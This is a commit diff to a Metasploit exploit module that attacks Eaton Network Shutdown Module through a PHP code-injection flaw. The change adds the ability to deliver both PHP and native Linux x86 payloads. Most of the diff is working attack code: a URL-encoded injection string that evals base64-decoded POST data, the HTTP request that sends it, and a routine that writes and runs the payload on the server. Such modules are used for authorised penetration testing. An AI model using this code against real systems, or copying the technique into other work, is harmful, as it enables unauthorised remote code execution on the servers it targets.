Use PhpEXE to be able to support PHP and Linux native payloads

Author: sinn3r

modules/exploits/multi/http/eaton_nsm_code_exec.rb

@@ -6,11 +6,13 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/php_exe'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
 
 	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::PhpEXE
 
 	def initialize(info = {})
 		super(update_info(info,
@@ -22,9 +24,12 @@ def initialize(info = {})
 				note that in order to be able to steal credentials, the vulnerable service
 				must have at least one USV module (an entry in the "nodes" table in mgedb.db)
 			},
-			'Author'         => [ 'h0ng10' ],       # original discovery, msf module
+			'Author'         =>
+				[
+					'h0ng10',  # original discovery, msf module
+					'sinn3r'   # PhpEXE shizzle
+				],
 			'License'        => MSF_LICENSE,
-			'Version'        => '$Revision$',
 			'References'     =>
 				[
 					['OSVDB', '83199'],
@@ -33,13 +38,16 @@ def initialize(info = {})
 			'Payload'        =>
 				{
 					'DisableNops' => true,
-					'Space'       => 4000,
-					'Keys'        => ['php']
+					'Space'       => 4000
 				},
-			'Platform'        => ['php'],
+			'Platform'       => ['php', 'linux'],
 			'Arch'           => ARCH_PHP,
 
-			'Targets'        => [[ 'Automatic', { }]],
+			'Targets'        =>
+				[
+					[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' }  ],
+					[ 'Linux x86'            , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
+				],
 			'DefaultTarget'  => 0,
 			'Privileged'     => true,
 			'DisclosureDate' => 'Jun 26 2012'
@@ -66,9 +74,8 @@ def check
 
 	def execute_php_code(code, opts = {})
 		param_name = rand_text_alpha(6)
-		padding = rand_text_alpha(6)
-		php_code = Rex::Text.encode_base64(code)
-		url_param = "#{padding}%22%5d,%20eval(base64_decode(%24_POST%5b%27#{param_name}%27%5d))%29;%2f%2f"
+		padding    = rand_text_alpha(6)
+		url_param  = "#{padding}%22%5d,%20eval(base64_decode(%24_POST%5b%27#{param_name}%27%5d))%29;%2f%2f"
 
 		res = send_request_cgi(
 			{
@@ -80,19 +87,27 @@ def execute_php_code(code, opts = {})
 					},
 				'vars_post' =>
 					{
-						param_name => php_code,
+						param_name => Rex::Text.encode_base64(code),
 					},
 				'headers' =>
 					{
 						'Connection' => 'Close',
 					}
-				})
-		res
+			})
+	end
+
+	def no_php_tags(p)
+		p = p.gsub(/^<\?php /, '')
+		p.gsub(/ \?\>$/, '')
 	end
 
 	def exploit
 		print_status("#{rhost}:#{rport} - Sending payload")
-		execute_php_code(payload.encoded)
+
+		unlink = (target['Platform'] == 'linux') ? true : false
+		p      = no_php_tags(get_write_exec_payload(:unlink_self => unlink))
+
+		execute_php_code(p)
 		handler
 	end
 end